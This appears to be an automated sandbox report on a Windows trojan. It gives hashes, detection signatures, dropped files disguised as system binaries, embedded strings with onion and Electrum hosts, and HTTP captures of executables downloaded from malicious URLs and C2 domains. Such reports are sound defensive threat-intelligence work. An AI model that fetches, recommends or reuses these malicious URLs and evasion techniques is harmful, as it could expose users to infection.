Windows Analysis Report 0NlSa5bf55

Overview

General Information

Sample Name: 0NlSa5bf55 (renamed file extension from none to exe)
Analysis ID: 515565
MD5: ee30d6928c9de84049aa055417cc767e
SHA1: a2aec2076bdfa92e5cda03443bec7b6c3287b43a
SHA256: 0ab024b0da0436fddc99679a74a26fdcd9851eb00e88ff2998f001ccd0c9016f
Tags: 32exetrojan
Infos:

Most interesting Screenshot:

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sigma detected: System File Execution Location Anomaly
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
May modify the system service descriptor table (often done to hook functions)
Machine Learning detection for dropped file
Contains functionality to inject threads in other processes
Performs DNS TXT record lookups
Sigma detected: Suspicious Service DACL Modification
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: 0NlSa5bf55.exe Virustotal: Detection: 66% Perma Link
Source: 0NlSa5bf55.exe ReversingLabs: Detection: 64%
Antivirus detection for URL or domain
Source: https://runmodes.com/api/logMachineGuidServiceVersionarch=64&build_number=17134&ec%3Af4%3Abb%3A86%3A Avira URL Cloud: Label: malware
Source: https://runmodes.com/api/log Avira URL Cloud: Label: malware
Source: https://runmodes.com/api/log442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com Avira URL Cloud: Label: malware
Source: http://newscommer.com/app/app.exe URL Reputation: Label: malware
Source: https://runmodes.com/api/loginvalid Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: runmodes.com Virustotal: Detection: 6% Perma Link
Source: server16.trumops.com Virustotal: Detection: 6% Perma Link
Source: gohnot.com Virustotal: Detection: 10% Perma Link
Source: server2.trumops.com Virustotal: Detection: 6% Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Avira: detection malicious, Label: TR/Agent.twerk
Source: C:\Users\user\Desktop\upd.exe Avira: detection malicious, Label: TR/AD.GoCloudnet.vvvot
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Avira: detection malicious, Label: TR/Redcap.gsjan
Source: C:\Windows\windefender.exe Avira: detection malicious, Label: TR/Crypt.XPACK.eocey
Source: C:\Windows\rss\csrss.exe Avira: detection malicious, Label: TR/AD.GoCloudnet.vvvot
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Metadefender: Detection: 45% Perma Link
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Metadefender: Detection: 13% Perma Link
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\upd.exe Metadefender: Detection: 31% Perma Link
Source: C:\Users\user\Desktop\upd.exe ReversingLabs: Detection: 85%
Source: C:\Windows\rss\csrss.exe Metadefender: Detection: 31% Perma Link
Source: C:\Windows\rss\csrss.exe ReversingLabs: Detection: 85%
Source: C:\Windows\windefender.exe Metadefender: Detection: 28% Perma Link
Source: C:\Windows\windefender.exe ReversingLabs: Detection: 78%
Machine Learning detection for dropped file
Source: C:\Users\user\Desktop\upd.exe Joe Sandbox ML: detected
Source: C:\Windows\rss\csrss.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 11.2.csrss.exe.11c38000.10.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.2.csrss.exe.11bb8000.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.0NlSa5bf55.exe.115f2000.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.0NlSa5bf55.exe.115f4000.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.0NlSa5bf55.exe.115f6000.2.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

barindex
Uses 32bit PE files
Source: 0NlSa5bf55.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
Source: Binary string: Loader.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, bootx64.efi.11.dr
Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: symsrv.pdb source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: '(.EfiGuardDxe.pdb source: upd.exe.0.dr
Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: The module signature does not match with .pdb signature. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: .pdb.dbg source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
Source: Binary string: symsrv.pdbGCTL source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: EfiGuardDxe.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: dbghelp.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: dbghelp.pdbGCTL source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose, 36_2_00007FF7019D5C10

Networking:

barindex
Found Tor onion address
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Nov 2021 12:12:39 GMTContent-Type: application/octet-streamContent-Length: 3788288Connection: keep-alivecontent-disposition: attachment; filename=app.exeetag: "616ea4c2-39ce00"last-modified: Tue, 19 Oct 2021 10:58:10 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 726Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aGUDRkZW12WFb0Z1WtbDazJRsyQjmf37XuogvaYwPWl6MnjPMl4eqYDp2G4rixUdVCHSJNAij3d%2BJyafZy7nG%2FpPEkNqHIpND7MIWu%2Fkz1fTe%2FgV6DrKP1Wv8esq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6a8dc077cd066933-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 24 8a 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 d0 39 00 00 10 00 00 00 30 52 00 20 08 8c 00 00 40 52 00 00 10 8c 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 20 8c 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 8c 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 30 52 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 d0 39 00 00 40 52 00 00 ca 39 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 10 8c 00 00 02 00 00 00 cc 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$90R @R@ UPX00RUPX19@R9@UPX29@
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Nov 2021 12:13:29 GMTContent-Type: application/octet-streamContent-Length: 2102272Connection: keep-alivecontent-disposition: attachment; filename=watchdog.exeetag: "616ea494-201400"last-modified: Tue, 19 Oct 2021 10:57:24 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 802Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yf%2BGD8l7373ZeZ%2Bx2Q1xpl%2FgZXFhtKWeXRYuOa7bn%2FvVZo559VS4xe2flpcsnosSzS0Rx9wZavPEonRFgpdfi6r8EDDYvPMTxUa18GxPfvjXzcqZC%2B2iZbRyMbg4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6a8dc1b08ff06913-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 